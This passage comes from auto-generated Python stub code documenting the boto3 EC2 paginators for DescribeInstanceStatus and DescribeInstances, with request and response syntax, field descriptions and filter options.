- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type InstanceIds: list
:param InstanceIds:
The instance IDs.
Default: Describes all your instances.
Constraints: Maximum 1000 explicitly specified instance IDs.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeInstanceStatus(Paginator):
def paginate(self, Filters: List = None, InstanceIds: List = None, DryRun: bool = None, IncludeAllInstances: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_instance_status`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeInstanceStatus>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
InstanceIds=[
'string',
],
DryRun=True|False,
IncludeAllInstances=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'InstanceStatuses': [
{
'AvailabilityZone': 'string',
'Events': [
{
'InstanceEventId': 'string',
'Code': 'instance-reboot'|'system-reboot'|'system-maintenance'|'instance-retirement'|'instance-stop',
'Description': 'string',
'NotAfter': datetime(2015, 1, 1),
'NotBefore': datetime(2015, 1, 1),
'NotBeforeDeadline': datetime(2015, 1, 1)
},
],
'InstanceId': 'string',
'InstanceState': {
'Code': 123,
'Name': 'pending'|'running'|'shutting-down'|'terminated'|'stopping'|'stopped'
},
'InstanceStatus': {
'Details': [
{
'ImpairedSince': datetime(2015, 1, 1),
'Name': 'reachability',
'Status': 'passed'|'failed'|'insufficient-data'|'initializing'
},
],
'Status': 'ok'|'impaired'|'insufficient-data'|'not-applicable'|'initializing'
},
'SystemStatus': {
'Details': [
{
'ImpairedSince': datetime(2015, 1, 1),
'Name': 'reachability',
'Status': 'passed'|'failed'|'insufficient-data'|'initializing'
},
],
'Status': 'ok'|'impaired'|'insufficient-data'|'not-applicable'|'initializing'
}
},
],
}
**Response Structure**
- *(dict) --*
- **InstanceStatuses** *(list) --*
Information about the status of the instances.
- *(dict) --*
Describes the status of an instance.
- **AvailabilityZone** *(string) --*
The Availability Zone of the instance.
- **Events** *(list) --*
Any scheduled events associated with the instance.
- *(dict) --*
Describes a scheduled event for an instance.
- **InstanceEventId** *(string) --*
The ID of the event.
- **Code** *(string) --*
The event code.
- **Description** *(string) --*
A description of the event.
After a scheduled event is completed, it can still be described for up to a week. If the event has been completed, this description starts with the following text: [Completed].
- **NotAfter** *(datetime) --*
The latest scheduled end time for the event.
- **NotBefore** *(datetime) --*
The earliest scheduled start time for the event.
- **NotBeforeDeadline** *(datetime) --*
The deadline for starting the event.
- **InstanceId** *(string) --*
The ID of the instance.
- **InstanceState** *(dict) --*
The intended state of the instance. DescribeInstanceStatus requires that an instance be in the ``running`` state.
- **Code** *(integer) --*
The state of the instance as a 16-bit unsigned integer.
The high byte is all of the bits between 2^8 and (2^16)-1, which equals decimal values between 256 and 65,535. These numerical values are used for internal purposes and should be ignored.
The low byte is all of the bits between 2^0 and (2^8)-1, which equals decimal values between 0 and 255.
The valid values for instance-state-code will all be in the range of the low byte and they are:
* ``0`` : ``pending``
* ``16`` : ``running``
* ``32`` : ``shutting-down``
* ``48`` : ``terminated``
* ``64`` : ``stopping``
* ``80`` : ``stopped``
You can ignore the high byte value by zeroing out all of the bits above 2^8 or 256 in decimal.
- **Name** *(string) --*
The current state of the instance.
- **InstanceStatus** *(dict) --*
Reports impaired functionality that stems from issues internal to the instance, such as impaired reachability.
- **Details** *(list) --*
The system instance health or application instance health.
- *(dict) --*
Describes the instance status.
- **ImpairedSince** *(datetime) --*
The time when a status check failed. For an instance that was launched and impaired, this is the time when the instance was launched.
- **Name** *(string) --*
The type of instance status.
- **Status** *(string) --*
The status.
- **Status** *(string) --*
The status.
- **SystemStatus** *(dict) --*
Reports impaired functionality that stems from issues related to the systems that support an instance, such as hardware failures and network connectivity problems.
- **Details** *(list) --*
The system instance health or application instance health.
- *(dict) --*
Describes the instance status.
- **ImpairedSince** *(datetime) --*
The time when a status check failed. For an instance that was launched and impaired, this is the time when the instance was launched.
- **Name** *(string) --*
The type of instance status.
- **Status** *(string) --*
The status.
- **Status** *(string) --*
The status.
:type Filters: list
:param Filters:
The filters.
* ``availability-zone`` - The Availability Zone of the instance.
* ``event.code`` - The code for the scheduled event (``instance-reboot`` | ``system-reboot`` | ``system-maintenance`` | ``instance-retirement`` | ``instance-stop`` ).
* ``event.description`` - A description of the event.
* ``event.instance-event-id`` - The ID of the event whose date and time you are modifying.
* ``event.not-after`` - The latest end time for the scheduled event (for example, ``2014-09-15T17:15:20.000Z`` ).
* ``event.not-before`` - The earliest start time for the scheduled event (for example, ``2014-09-15T17:15:20.000Z`` ).
* ``event.not-before-deadline`` - The deadline for starting the event (for example, ``2014-09-15T17:15:20.000Z`` ).
* ``instance-state-code`` - The code for the instance state, as a 16-bit unsigned integer. The high byte is used for internal purposes and should be ignored. The low byte is set based on the state represented. The valid values are 0 (pending), 16 (running), 32 (shutting-down), 48 (terminated), 64 (stopping), and 80 (stopped).
* ``instance-state-name`` - The state of the instance (``pending`` | ``running`` | ``shutting-down`` | ``terminated`` | ``stopping`` | ``stopped`` ).
* ``instance-status.reachability`` - Filters on instance status where the name is ``reachability`` (``passed`` | ``failed`` | ``initializing`` | ``insufficient-data`` ).
* ``instance-status.status`` - The status of the instance (``ok`` | ``impaired`` | ``initializing`` | ``insufficient-data`` | ``not-applicable`` ).
* ``system-status.reachability`` - Filters on system status where the name is ``reachability`` (``passed`` | ``failed`` | ``initializing`` | ``insufficient-data`` ).
* ``system-status.status`` - The system status of the instance (``ok`` | ``impaired`` | ``initializing`` | ``insufficient-data`` | ``not-applicable`` ).
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type InstanceIds: list
:param InstanceIds:
The instance IDs.
Default: Describes all your instances.
Constraints: Maximum 100 explicitly specified instance IDs.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type IncludeAllInstances: boolean
:param IncludeAllInstances:
When ``true`` , includes the health status for all instances. When ``false`` , includes the health status for running instances only.
Default: ``false``
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeInstances(Paginator):
def paginate(self, Filters: List = None, InstanceIds: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_instances`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeInstances>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
InstanceIds=[
'string',
],
DryRun=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Reservations': [
{
'Groups': [
{
'GroupName': 'string',
'GroupId': 'string'
},
],
'Instances': [
{
'AmiLaunchIndex': 123,
'ImageId': 'string',
'InstanceId': 'string',
'InstanceType': 't1.micro'|'t2.nano'|'t2.micro'|'t2.small'|'t2.medium'|'t2.large'|'t2.xlarge'|'t2.2xlarge'|'t3.nano'|'t3.micro'|'t3.small'|'t3.medium'|'t3.large'|'t3.xlarge'|'t3.2xlarge'|'t3a.nano'|'t3a.micro'|'t3a.small'|'t3a.medium'|'t3a.large'|'t3a.xlarge'|'t3a.2xlarge'|'m1.small'|'m1.medium'|'m1.large'|'m1.xlarge'|'m3.medium'|'m3.large'|'m3.xlarge'|'m3.2xlarge'|'m4.large'|'m4.xlarge'|'m4.2xlarge'|'m4.4xlarge'|'m4.10xlarge'|'m4.16xlarge'|'m2.xlarge'|'m2.2xlarge'|'m2.4xlarge'|'cr1.8xlarge'|'r3.large'|'r3.xlarge'|'r3.2xlarge'|'r3.4xlarge'|'r3.8xlarge'|'r4.large'|'r4.xlarge'|'r4.2xlarge'|'r4.4xlarge'|'r4.8xlarge'|'r4.16xlarge'|'r5.large'|'r5.xlarge'|'r5.2xlarge'|'r5.4xlarge'|'r5.12xlarge'|'r5.24xlarge'|'r5.metal'|'r5a.large'|'r5a.xlarge'|'r5a.2xlarge'|'r5a.4xlarge'|'r5a.12xlarge'|'r5a.24xlarge'|'r5d.large'|'r5d.xlarge'|'r5d.2xlarge'|'r5d.4xlarge'|'r5d.12xlarge'|'r5d.24xlarge'|'r5d.metal'|'r5ad.large'|'r5ad.xlarge'|'r5ad.2xlarge'|'r5ad.4xlarge'|'r5ad.8xlarge'|'r5ad.12xlarge'|'r5ad.16xlarge'|'r5ad.24xlarge'|'x1.16xlarge'|'x1.32xlarge'|'x1e.xlarge'|'x1e.2xlarge'|'x1e.4xlarge'|'x1e.8xlarge'|'x1e.16xlarge'|'x1e.32xlarge'|'i2.xlarge'|'i2.2xlarge'|'i2.4xlarge'|'i2.8xlarge'|'i3.large'|'i3.xlarge'|'i3.2xlarge'|'i3.4xlarge'|'i3.8xlarge'|'i3.16xlarge'|'i3.metal'|'hi1.4xlarge'|'hs1.8xlarge'|'c1.medium'|'c1.xlarge'|'c3.large'|'c3.xlarge'|'c3.2xlarge'|'c3.4xlarge'|'c3.8xlarge'|'c4.large'|'c4.xlarge'|'c4.2xlarge'|'c4.4xlarge'|'c4.8xlarge'|'c5.large'|'c5.xlarge'|'c5.2xlarge'|'c5.4xlarge'|'c5.9xlarge'|'c5.18xlarge'|'c5d.large'|'c5d.xlarge'|'c5d.2xlarge'|'c5d.4xlarge'|'c5d.9xlarge'|'c5d.18xlarge'|'c5n.large'|'c5n.xlarge'|'c5n.2xlarge'|'c5n.4xlarge'|'c5n.9xlarge'|'c5n.18xlarge'|'cc1.4xlarge'|'cc2.8xlarge'|'g2.2xlarge'|'g2.8xlarge'|'g3.4xlarge'|'g3.8xlarge'|'g3.16xlarge'|'g3s.xlarge'|'cg1.4xlarge'|'p2.xlarge'|'p2.8xlarge'|'p2.16xlarge'|'p3.2xlarge'|'p3.8xlarge'|'p3.16xlarge'|'p3dn.24xlarge'|'d2.xlarge'|'d2.2xlarge'|'d2.4xlarge'|'d2.8xlarge'|'f1.2xlarge'|'f1.4xlarge'|'f1.16xlarge'|'m5.large'|'m5.xlarge'|'m5.2xlarge'|'m5.4xlarge'|'m5.12xlarge'|'m5.24xlarge'|'m5.metal'|'m5a.large'|'m5a.xlarge'|'m5a.2xlarge'|'m5a.4xlarge'|'m5a.12xlarge'|'m5a.24xlarge'|'m5d.large'|'m5d.xlarge'|'m5d.2xlarge'|'m5d.4xlarge'|'m5d.12xlarge'|'m5d.24xlarge'|'m5d.metal'|'m5ad.large'|'m5ad.xlarge'|'m5ad.2xlarge'|'m5ad.4xlarge'|'m5ad.8xlarge'|'m5ad.12xlarge'|'m5ad.16xlarge'|'m5ad.24xlarge'|'h1.2xlarge'|'h1.4xlarge'|'h1.8xlarge'|'h1.16xlarge'|'z1d.large'|'z1d.xlarge'|'z1d.2xlarge'|'z1d.3xlarge'|'z1d.6xlarge'|'z1d.12xlarge'|'z1d.metal'|'u-6tb1.metal'|'u-9tb1.metal'|'u-12tb1.metal'|'a1.medium'|'a1.large'|'a1.xlarge'|'a1.2xlarge'|'a1.4xlarge',
'KernelId': 'string',
'KeyName': 'string',
'LaunchTime': datetime(2015, 1, 1),
'Monitoring': {
'State': 'disabled'|'disabling'|'enabled'|'pending'
},
'Placement': {
'AvailabilityZone': 'string',
'Affinity': 'string',
'GroupName': 'string',
'PartitionNumber': 123,
'HostId': 'string',
'Tenancy': 'default'|'dedicated'|'host',
'SpreadDomain': 'string'
},
'Platform': 'Windows',
'PrivateDnsName': 'string',
'PrivateIpAddress': 'string',
'ProductCodes': [
{
'ProductCodeId': 'string',
'ProductCodeType': 'devpay'|'marketplace'
},
],
'PublicDnsName': 'string',
'PublicIpAddress': 'string',
'RamdiskId': 'string',
'State': {
'Code': 123,
'Name': 'pending'|'running'|'shutting-down'|'terminated'|'stopping'|'stopped'
},
'StateTransitionReason': 'string',
'SubnetId': 'string',
'VpcId': 'string',
'Architecture': 'i386'|'x86_64'|'arm64',
'BlockDeviceMappings': [
{
'DeviceName': 'string',
'Ebs': {
'AttachTime': datetime(2015, 1, 1),
'DeleteOnTermination': True|False,
'Status': 'attaching'|'attached'|'detaching'|'detached',
'VolumeId': 'string'
}
},
],
'ClientToken': 'string',
'EbsOptimized': True|False,
'EnaSupport': True|False,
'Hypervisor': 'ovm'|'xen',
'IamInstanceProfile': {
'Arn': 'string',
'Id': 'string'
},
'InstanceLifecycle': 'spot'|'scheduled',
'ElasticGpuAssociations': [
{
'ElasticGpuId': 'string',
'ElasticGpuAssociationId': 'string',
'ElasticGpuAssociationState': 'string',
'ElasticGpuAssociationTime': 'string'
},
],
'ElasticInferenceAcceleratorAssociations': [
{
'ElasticInferenceAcceleratorArn': 'string',
'ElasticInferenceAcceleratorAssociationId': 'string',
'ElasticInferenceAcceleratorAssociationState': 'string',
'ElasticInferenceAcceleratorAssociationTime': datetime(2015, 1, 1)
},
],
'NetworkInterfaces': [
{
'Association': {
'IpOwnerId': 'string',
'PublicDnsName': 'string',
'PublicIp': 'string'
},
'Attachment': {
'AttachTime': datetime(2015, 1, 1),
'AttachmentId': 'string',
'DeleteOnTermination': True|False,
'DeviceIndex': 123,
'Status': 'attaching'|'attached'|'detaching'|'detached'
},
'Description': 'string',
'Groups': [
{
'GroupName': 'string',
'GroupId': 'string'
},
],
'Ipv6Addresses': [
{
'Ipv6Address': 'string'
},
],
'MacAddress': 'string',
'NetworkInterfaceId': 'string',
'OwnerId': 'string',
'PrivateDnsName': 'string',
'PrivateIpAddress': 'string',
'PrivateIpAddresses': [
{
'Association': {
'IpOwnerId': 'string',
'PublicDnsName': 'string',
'PublicIp': 'string'
},
'Primary': True|False,
'PrivateDnsName': 'string',
'PrivateIpAddress': 'string'
},
],
'SourceDestCheck': True|False,
'Status': 'available'|'associated'|'attaching'|'in-use'|'detaching',
'SubnetId': 'string',
'VpcId': 'string',
'InterfaceType': 'string'
},
],
'RootDeviceName': 'string',
'RootDeviceType': 'ebs'|'instance-store',
'SecurityGroups': [
{
'GroupName': 'string',
'GroupId': 'string'
},
],
'SourceDestCheck': True|False,
'SpotInstanceRequestId': 'string',
'SriovNetSupport': 'string',
'StateReason': {
'Code': 'string',
'Message': 'string'
},
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'VirtualizationType': 'hvm'|'paravirtual',
'CpuOptions': {
'CoreCount': 123,
'ThreadsPerCore': 123
},
'CapacityReservationId': 'string',
'CapacityReservationSpecification': {
'CapacityReservationPreference': 'open'|'none',
'CapacityReservationTarget': {
'CapacityReservationId': 'string'
}
},
'HibernationOptions': {
'Configured': True|False
},
'Licenses': [
{
'LicenseConfigurationArn': 'string'
},
]
},
],
'OwnerId': 'string',
'RequesterId': 'string',
'ReservationId': 'string'
},
],
}
**Response Structure**
- *(dict) --*
- **Reservations** *(list) --*
Information about the reservations.
- *(dict) --*
Describes a reservation.
- **Groups** *(list) --*
[EC2-Classic only] The security groups.
- *(dict) --*
Describes a security group.
- **GroupName** *(string) --*
The name of the security group.
- **GroupId** *(string) --*
The ID of the security group.
- **Instances** *(list) --*
The instances.
- *(dict) --*
Describes an instance.
- **AmiLaunchIndex** *(integer) --*
The AMI launch index, which can be used to find this instance in the launch group.
- **ImageId** *(string) --*
The ID of the AMI used to launch the instance.
- **InstanceId** *(string) --*
The ID of the instance.
- **InstanceType** *(string) --*
The instance type.
- **KernelId** *(string) --*
The kernel associated with this instance, if applicable.
- **KeyName** *(string) --*
The name of the key pair, if this instance was launched with an associated key pair.
- **LaunchTime** *(datetime) --*
The time the instance was launched.
- **Monitoring** *(dict) --*
The monitoring for the instance.
- **State** *(string) --*
Indicates whether detailed monitoring is enabled. Otherwise, basic monitoring is enabled.
- **Placement** *(dict) --*
The location where the instance launched, if applicable.
- **AvailabilityZone** *(string) --*
The Availability Zone of the instance.
If not specified, an Availability Zone will be automatically chosen for you based on the load balancing criteria for the region.
- **Affinity** *(string) --*
The affinity setting for the instance on the Dedicated Host. This parameter is not supported for the ImportInstance command.
- **GroupName** *(string) --*
The name of the placement group the instance is in.
- **PartitionNumber** *(integer) --*
The number of the partition the instance is in. Valid only if the placement group strategy is set to ``partition`` .
- **HostId** *(string) --*
The ID of the Dedicated Host on which the instance resides. This parameter is not supported for the ImportInstance command.
- **Tenancy** *(string) --*
The tenancy of the instance (if the instance is running in a VPC). An instance with a tenancy of ``dedicated`` runs on single-tenant hardware. The ``host`` tenancy is not supported for the ImportInstance command.
- **SpreadDomain** *(string) --*
Reserved for future use.
- **Platform** *(string) --*
The value is ``Windows`` for Windows instances; otherwise blank.
- **PrivateDnsName** *(string) --*
(IPv4 only) The private DNS hostname name assigned to the instance. This DNS hostname can only be used inside the Amazon EC2 network. This name is not available until the instance enters the ``running`` state.
[EC2-VPC] The Amazon-provided DNS server resolves Amazon-provided private DNS hostnames if you've enabled DNS resolution and DNS hostnames in your VPC. If you are not using the Amazon-provided DNS server in your VPC, your custom domain name servers must resolve the hostname as appropriate.
- **PrivateIpAddress** *(string) --*
The private IPv4 address assigned to the instance.
- **ProductCodes** *(list) --*
The product codes attached to this instance, if applicable.
- *(dict) --*
Describes a product code.
- **ProductCodeId** *(string) --*
The product code.
- **ProductCodeType** *(string) --*
The type of product code.
- **PublicDnsName** *(string) --*
(IPv4 only) The public DNS name assigned to the instance. This name is not available until the instance enters the ``running`` state. For EC2-VPC, this name is only available if you've enabled DNS hostnames for your VPC.
- **PublicIpAddress** *(string) --*
The public IPv4 address assigned to the instance, if applicable.
- **RamdiskId** *(string) --*
The RAM disk associated with this instance, if applicable.
- **State** *(dict) --*
The current state of the instance.
- **Code** *(integer) --*
The state of the instance as a 16-bit unsigned integer.
The high byte is all of the bits between 2^8 and (2^16)-1, which equals decimal values between 256 and 65,535. These numerical values are used for internal purposes and should be ignored.
The low byte is all of the bits between 2^0 and (2^8)-1, which equals decimal values between 0 and 255.
The valid values for instance-state-code will all be in the range of the low byte and they are:
* ``0`` : ``pending``
* ``16`` : ``running``
* ``32`` : ``shutting-down``
* ``48`` : ``terminated``
* ``64`` : ``stopping``
* ``80`` : ``stopped``
You can ignore the high byte value by zeroing out all of the bits above 2^8 or 256 in decimal.
- **Name** *(string) --*
The current state of the instance.
- **StateTransitionReason** *(string) --*
The reason for the most recent state transition. This might be an empty string.
- **SubnetId** *(string) --*
[EC2-VPC] The ID of the subnet in which the instance is running.
- **VpcId** *(string) --*
[EC2-VPC] The ID of the VPC in which the instance is running.
- **Architecture** *(string) --*
The architecture of the image.
- **BlockDeviceMappings** *(list) --*
Any block device mapping entries for the instance.
- *(dict) --*
Describes a block device mapping.
- **DeviceName** *(string) --*
The device name (for example, ``/dev/sdh`` or ``xvdh`` ).
- **Ebs** *(dict) --*
Parameters used to automatically set up EBS volumes when the instance is launched.
- **AttachTime** *(datetime) --*
The time stamp when the attachment initiated.
- **DeleteOnTermination** *(boolean) --*
Indicates whether the volume is deleted on instance termination.
- **Status** *(string) --*
The attachment state.
- **VolumeId** *(string) --*
The ID of the EBS volume.
- **ClientToken** *(string) --*
The idempotency token you provided when you launched the instance, if applicable.
- **EbsOptimized** *(boolean) --*
Indicates whether the instance is optimized for Amazon EBS I/O. This optimization provides dedicated throughput to Amazon EBS and an optimized configuration stack to provide optimal I/O performance. This optimization isn't available with all instance types. Additional usage charges apply when using an EBS Optimized instance.
- **EnaSupport** *(boolean) --*
Specifies whether enhanced networking with ENA is enabled.
- **Hypervisor** *(string) --*
The hypervisor type of the instance.
- **IamInstanceProfile** *(dict) --*
The IAM instance profile associated with the instance, if applicable.
- **Arn** *(string) --*
The Amazon Resource Name (ARN) of the instance profile.
- **Id** *(string) --*
The ID of the instance profile.
- **InstanceLifecycle** *(string) --*
Indicates whether this is a Spot Instance or a Scheduled Instance.
- **ElasticGpuAssociations** *(list) --*
The Elastic GPU associated with the instance.
- *(dict) --*
Describes the association between an instance and an Elastic Graphics accelerator.
- **ElasticGpuId** *(string) --*
The ID of the Elastic Graphics accelerator.
- **ElasticGpuAssociationId** *(string) --*
The ID of the association.
- **ElasticGpuAssociationState** *(string) --*
The state of the association between the instance and the Elastic Graphics accelerator.
- **ElasticGpuAssociationTime** *(string) --*
The time the Elastic Graphics accelerator was associated with the instance.
- **ElasticInferenceAcceleratorAssociations** *(list) --*
The elastic inference accelerator associated with the instance.
- *(dict) --*
Describes the association between an instance and an elastic inference accelerator.
- **ElasticInferenceAcceleratorArn** *(string) --*
The Amazon Resource Name (ARN) of the elastic inference accelerator.
- **ElasticInferenceAcceleratorAssociationId** *(string) --*
The ID of the association.
- **ElasticInferenceAcceleratorAssociationState** *(string) --*
The state of the elastic inference accelerator.
- **ElasticInferenceAcceleratorAssociationTime** *(datetime) --*
The time at which the elastic inference accelerator is associated with an instance.
- **NetworkInterfaces** *(list) --*
[EC2-VPC] The network interfaces for the instance.
- *(dict) --*
Describes a network interface.
- **Association** *(dict) --*
The association information for an Elastic IPv4 associated with the network interface.
- **IpOwnerId** *(string) --*
The ID of the owner of the Elastic IP address.
- **PublicDnsName** *(string) --*
The public DNS name.
- **PublicIp** *(string) --*
The public IP address or Elastic IP address bound to the network interface.
- **Attachment** *(dict) --*
The network interface attachment.
- **AttachTime** *(datetime) --*
The time stamp when the attachment initiated.
- **AttachmentId** *(string) --*
The ID of the network interface attachment.
- **DeleteOnTermination** *(boolean) --*
Indicates whether the network interface is deleted when the instance is terminated.
- **DeviceIndex** *(integer) --*
The index of the device on the instance for the network interface attachment.
- **Status** *(string) --*
The attachment state.
- **Description** *(string) --*
The description.
- **Groups** *(list) --*
One or more security groups.
- *(dict) --*
Describes a security group.
- **GroupName** *(string) --*
The name of the security group.
- **GroupId** *(string) --*
The ID of the security group.
- **Ipv6Addresses** *(list) --*
One or more IPv6 addresses associated with the network interface.
- *(dict) --*
Describes an IPv6 address.
- **Ipv6Address** *(string) --*
The IPv6 address.
- **MacAddress** *(string) --*
The MAC address.
- **NetworkInterfaceId** *(string) --*
The ID of the network interface.
- **OwnerId** *(string) --*
The ID of the AWS account that created the network interface.
- **PrivateDnsName** *(string) --*
The private DNS name.
- **PrivateIpAddress** *(string) --*
The IPv4 address of the network interface within the subnet.
- **PrivateIpAddresses** *(list) --*
One or more private IPv4 addresses associated with the network interface.
- *(dict) --*
Describes a private IPv4 address.
- **Association** *(dict) --*
The association information for an Elastic IP address for the network interface.
- **IpOwnerId** *(string) --*
The ID of the owner of the Elastic IP address.
- **PublicDnsName** *(string) --*
The public DNS name.
- **PublicIp** *(string) --*
The public IP address or Elastic IP address bound to the network interface.
- **Primary** *(boolean) --*
Indicates whether this IPv4 address is the primary private IP address of the network interface.
- **PrivateDnsName** *(string) --*
The private IPv4 DNS name.
- **PrivateIpAddress** *(string) --*
The private IPv4 address of the network interface.
- **SourceDestCheck** *(boolean) --*
Indicates whether to validate network traffic to or from this network interface.
- **Status** *(string) --*
The status of the network interface.
- **SubnetId** *(string) --*
The ID of the subnet.
- **VpcId** *(string) --*
The ID of the VPC.
- **InterfaceType** *(string) --*
Describes the type of network interface.
- **RootDeviceName** *(string) --*
The device name of the root device volume (for example, ``/dev/sda1`` ).
- **RootDeviceType** *(string) --*
The root device type used by the AMI. The AMI can use an EBS volume or an instance store volume.
- **SecurityGroups** *(list) --*
The security groups for the instance.
- *(dict) --*
Describes a security group.
- **GroupName** *(string) --*
The name of the security group.
- **GroupId** *(string) --*
The ID of the security group.
- **SourceDestCheck** *(boolean) --*
Specifies whether to enable an instance launched in a VPC to perform NAT. This controls whether source/destination checking is enabled on the instance. A value of ``true`` means that checking is enabled, and ``false`` means that checking is disabled. The value must be ``false`` for the instance to perform NAT. For more information, see `NAT Instances <https://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/VPC_NAT_Instance.html>`__ in the *Amazon Virtual Private Cloud User Guide* .
- **SpotInstanceRequestId** *(string) --*
If the request is a Spot Instance request, the ID of the request.
- **SriovNetSupport** *(string) --*
Specifies whether enhanced networking with the Intel 82599 Virtual Function interface is enabled.
- **StateReason** *(dict) --*
The reason for the most recent state transition.
- **Code** *(string) --*
The reason code for the state change.
- **Message** *(string) --*
The message for the state change.
* ``Server.InsufficientInstanceCapacity`` : There was insufficient capacity available to satisfy the launch request.
* ``Server.InternalError`` : An internal error caused the instance to terminate during launch.
* ``Server.ScheduledStop`` : The instance was stopped due to a scheduled retirement.
* ``Server.SpotInstanceShutdown`` : The instance was stopped because the number of Spot requests with a maximum price equal to or higher than the Spot price exceeded available capacity or because of an increase in the Spot price.
* ``Server.SpotInstanceTermination`` : The instance was terminated because the number of Spot requests with a maximum price equal to or higher than the Spot price exceeded available capacity or because of an increase in the Spot price.
* ``Client.InstanceInitiatedShutdown`` : The instance was shut down using the ``shutdown -h`` command from the instance.
* ``Client.InstanceTerminated`` : The instance was terminated or rebooted during AMI creation.
* ``Client.InternalError`` : A client error caused the instance to terminate during launch.
* ``Client.InvalidSnapshot.NotFound`` : The specified snapshot was not found.
* ``Client.UserInitiatedHibernate`` : Hibernation was initiated on the instance.
* ``Client.UserInitiatedShutdown`` : The instance was shut down using the Amazon EC2 API.
* ``Client.VolumeLimitExceeded`` : The limit on the number of EBS volumes or total storage was exceeded. Decrease usage or request an increase in your account limits.
- **Tags** *(list) --*
Any tags assigned to the instance.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
- **VirtualizationType** *(string) --*
The virtualization type of the instance.
- **CpuOptions** *(dict) --*
The CPU options for the instance.
- **CoreCount** *(integer) --*
The number of CPU cores for the instance.
- **ThreadsPerCore** *(integer) --*
The number of threads per CPU core.
- **CapacityReservationId** *(string) --*
The ID of the Capacity Reservation.
- **CapacityReservationSpecification** *(dict) --*
Information about the Capacity Reservation targeting option.
- **CapacityReservationPreference** *(string) --*
Describes the instance's Capacity Reservation preferences. Possible preferences include:
* ``open`` - The instance can run in any ``open`` Capacity Reservation that has matching attributes (instance type, platform, Availability Zone).
* ``none`` - The instance avoids running in a Capacity Reservation even if one is available. The instance runs in On-Demand capacity.
- **CapacityReservationTarget** *(dict) --*
Information about the targeted Capacity Reservation.
- **CapacityReservationId** *(string) --*
The ID of the Capacity Reservation.
- **HibernationOptions** *(dict) --*
Indicates whether the instance is enabled for hibernation.
- **Configured** *(boolean) --*
If this parameter is set to ``true`` , your instance is enabled for hibernation; otherwise, it is not enabled for hibernation.
- **Licenses** *(list) --*
The license configurations.
- *(dict) --*
Describes a license configuration.
- **LicenseConfigurationArn** *(string) --*
The Amazon Resource Name (ARN) of the license configuration.
- **OwnerId** *(string) --*
The ID of the AWS account that owns the reservation.
- **RequesterId** *(string) --*
The ID of the requester that launched the instances on your behalf (for example, AWS Management Console or Auto Scaling).
- **ReservationId** *(string) --*
The ID of the reservation.
:type Filters: list
:param Filters:
The filters.
* ``affinity`` - The affinity setting for an instance running on a Dedicated Host (``default`` | ``host`` ).
* ``architecture`` - The instance architecture (``i386`` | ``x86_64`` ).
* ``availability-zone`` - The Availability Zone of the instance.
* ``block-device-mapping.attach-time`` - The attach time for an EBS volume mapped to the instance, for example, ``2010-09-15T17:15:20.000Z`` .
* ``block-device-mapping.delete-on-termination`` - A Boolean that indicates whether the EBS volume is deleted on instance termination.
* ``block-device-mapping.device-name`` - The device name specified in the block device mapping (for example, ``/dev/sdh`` or ``xvdh`` ).
* ``block-device-mapping.status`` - The status for the EBS volume (``attaching`` | ``attached`` | ``detaching`` | ``detached`` ).
* ``block-device-mapping.volume-id`` - The volume ID of the EBS volume.
* ``client-token`` - The idempotency token you provided when you launched the instance.
* ``dns-name`` - The public DNS name of the instance.
* ``group-id`` - The ID of the security group for the instance. EC2-Classic only.
